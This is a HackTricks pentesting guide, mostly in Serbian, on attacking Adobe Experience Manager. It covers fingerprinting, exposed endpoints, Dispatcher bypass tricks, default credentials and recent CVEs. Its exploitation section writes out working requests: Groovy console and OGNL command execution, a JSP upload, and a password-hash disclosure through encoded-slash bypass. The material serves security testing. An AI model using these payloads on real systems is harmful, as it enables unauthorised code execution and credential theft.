HackTricks
AEM (Adobe Experience Manager) Pentesting
Tip
Učite i vežbajte AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.
Adobe Experience Manager (AEM, part of the Adobe Experience Cloud) je CMS za preduzeća koji radi na Apache Sling/Felix (OSGi) i Java Content Repository (JCR). Iz perspektive napadača, AEM instance vrlo često izlažu opasne development endpoints, slaba Dispatcher pravila, default credentials i veliki broj CVE-ova koji se zakrpljuju svakog kvartala.
The checklist below focuses on externally reachable (unauth) attack surface that keeps showing up in real engagements (2022-2026).
1. Fingerprinting
$ curl -s -I https://target | egrep -i "aem|sling|cq"
X-Content-Type-Options: nosniff
X-Dispatcher: hu1 # header added by AEM Dispatcher
X-Vary: Accept-Encoding
Ostali brzi indikatori:
/etc.clientlibs/static path present (vraća JS/CSS)./libs/granite/core/content/login.htmllogin page sa “Adobe Experience Manager” bannerom.</script><!--/* CQ */-->komentar na dnu HTML-a.
2. Visoko-vredni neautentifikovani endpointi
| Path | Šta dobijate | Napomene |
|---|---|---|
/.json, /.1.json | JCR nodes via DefaultGetServlet | Često blokirano, ali Dispatcher bypass (vidi dole) radi. |
/bin/querybuilder.json?path=/ | QueryBuilder API | Leak strukture stranica, internih putanja i korisničkih imena. |
/system/console/status-*, /system/console/bundles | OSGi/Felix console | 403 po defaultu; ako je izloženo i pronađeni kredencijali ⇒ bundle-upload RCE. |
/crx/packmgr/index.jsp | Package Manager | Dozvoljava upload content packages uz autentifikaciju → JSP payload upload. |
/etc/groovyconsole/** | AEM Groovy Console | Ako je izložen → proizvoljno izvršavanje Groovy / Java. |
/libs/cq/AuditlogSearchServlet.json | Audit logs | Otkrivanje informacija. |
/libs/cq/ui/content/dumplibs.html | ClientLibs dump | XSS vector. |
/adminui/debug | AEM Forms on JEE Struts dev-mode OGNL evaluator | Na pogrešno konfigurisanim Forms instalacijama (CVE-2025-54253) ovaj endpoint izvršava neautentifikovani OGNL → RCE. |
Dispatcher bypass tricks (i dalje rade u 2025/2026)
Most production sites sit behind the Dispatcher (reverse-proxy). Filter rules are frequently bypassed by abusing encoded characters or allowed static extensions.
- Klasičan semikolon + dozvoljena ekstenzija
GET /bin/querybuilder.json;%0aa.css?path=/home&type=rep:User HTTP/1.1
Encoded slash bypass (2025 KB ka-27832)
GET /%2fbin%2fquerybuilder.json?path=/etc&1_property=jcr:primaryType HTTP/1.1
Ako Dispatcher dozvoljava enkodovane kose crte, ovo vraća JSON čak i kada je /bin navodno zabranjen.
3. Česte pogrešne konfiguracije (još aktivne u 2026)
- Anonymous POST servlet –
POST /.jsonsa:operation=importomogućava kreiranje novih JCR nodes. Blokiranje*.jsonPOST zahteva u Dispatcher-u to rešava. - World-readable user profiles – podrazumevani ACL dodeljuje
jcr:readna/home/users/**/profile/*svima. - Default credentials –
admin:admin,author:author,replication:replication. - WCMDebugFilter enabled ⇒ reflected XSS via
?debug=layout(CVE-2016-7882, i dalje se nalazi na legacy 6.4 instalacijama). - Groovy Console exposed – remote code execution slanjem Groovy skripta:
curl -u admin:admin -d 'script=println "pwn".execute()' https://target/bin/groovyconsole/post.json
- Dispatcher encoded-slash gap –
/bin/querybuilder.jsonand/etc/truststore.jsondostupni koristeći%2f/%3Bčak i kada su blokirani path filterima. - AEM Forms Struts devMode left enabled –
/adminui/debug?expression=evaluira OGNL bez autentifikacije (CVE-2025-54253) što dovodi do neautentifikovanog RCE; u paru sa XXE u Forms submission (CVE-2025-54254) omogućava čitanje fajlova.
4. Nedavne ranjivosti (kadenca service-packova)
| Quarter | CVE / Bulletin | Affected | Impact |
|---|---|---|---|
| Dec 2025 | APSB25-115, CVE-2025-64537/64539 | 6.5.24 & earlier, Cloud 2025.12 | Više kritičnih/stored XSS → izvršenje koda preko author UI. |
| Sep 2025 | APSB25-90 | 6.5.23 & earlier | Lanac zaobilaženja sigurnosne funkcije (Dispatcher auth checker) – nadograditi na 6.5.24/Cloud 2025.12. |
| Aug 2025 | CVE-2025-54253 / 54254 (AEM Forms JEE) | Forms 6.5.23.0 and earlier | DevMode OGNL RCE + XXE čitanje fajlova, neautentifikovano. |
| Jun 2025 | APSB25-48 | 6.5.23 & earlier | Stored XSS i eskalacija privilegija u Communities komponentama. |
| Dec 2024 | APSB24-69 (rev. Mar 2025 adds CVE-2024-53962…74) | 6.5.22 & earlier | DOM/Stored XSS, proizvoljno izvršenje koda (nizak nivo privilegija). |
| Dec 2023 | APSB23-72 | ≤ 6.5.18 | DOM-based XSS preko posebno oblikovanog URL-a. |
Uvek proverite APSB bilten koji odgovara klijentovom service-packu i zahtevajte najnoviju verziju 6.5.24 (Nov 26, 2025) ili Cloud Service 2025.12. AEM Forms on JEE zahteva svoj add-on hotfix 6.5.0-0108+.
5. Primeri eksploatacije
5.1 RCE via dispatcher bypass + JSP upload
If anonymous write is possible:
# 1. Create a node that will become /content/evil.jsp
POST /content/evil.jsp;%0aa.css HTTP/1.1
Content-Type: application/x-www-form-urlencoded
:contentType=text/plain
jcr:data=<% out.println("pwned"); %>
:operation=import
Sada zatražite /content/evil.jsp – JSP se izvršava pod AEM process user-om.
5.2 SSRF to RCE (historical < 6.3)
/libs/mcm/salesforce/customer.html;%0aa.css?checkType=authorize&authorization_url=http://127.0.0.1:4502/system/console
aem_ssrf2rce.py iz aem-hacker automatizuje ceo lanac.
5.3 OGNL RCE na AEM Forms JEE (CVE-2025-54253)
# Unauth devMode OGNL to run whoami
curl -k "https://target:8443/adminui/debug?expression=%23cmd%3D%27whoami%27,%23p=new%20java.lang.ProcessBuilder(%23cmd).start(),%23out=new%20java.io.InputStreamReader(%23p.getInputStream()),%23br=new%20java.io.BufferedReader(%23out),%23br.readLine()"
Ako je ranjiv, HTTP telo sadrži izlaz komande.
5.4 QueryBuilder hash disclosure (encoded slash bypass)
GET /%2fbin%2fquerybuilder.json?path=/home&type=rep:User&p.hits=full&p.nodedepth=2&p.offset=0 HTTP/1.1
Vraća korisničke čvorove uključujući rep:password hešove kada su anonymous read ACLs podrazumevane.
6. Alati
- aem-hacker – sveobuhvatni skript za enumeraciju, podržava dispatcher bypass, SSRF detection, default-creds checks i više.
python3 aem_hacker.py -u https://target --host attacker-ip
- Tenable WAS plugin 115065 – Otkriva QueryBuilder hash disclosure & encoded-slash bypass automatski (published Dec 2025).
- Content brute-force – rekurzivno šaljite zahteve ka
/_jcr_content.(json|html)da biste otkrili skrivene komponente. - osgi-infect – otpremite zlonamerni OSGi bundle preko
/system/console/bundlesako su creds dostupni.
Reference
- Adobe Security Bulletin APSB25-115 – Security updates for Adobe Experience Manager (Dec 9, 2025)
- BleepingComputer – Adobe issues emergency fixes for AEM Forms zero-days (Aug 5, 2025)
Tip
Učite i vežbajte AWS Hacking:
Učite i vežbajte GCP Hacking:Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.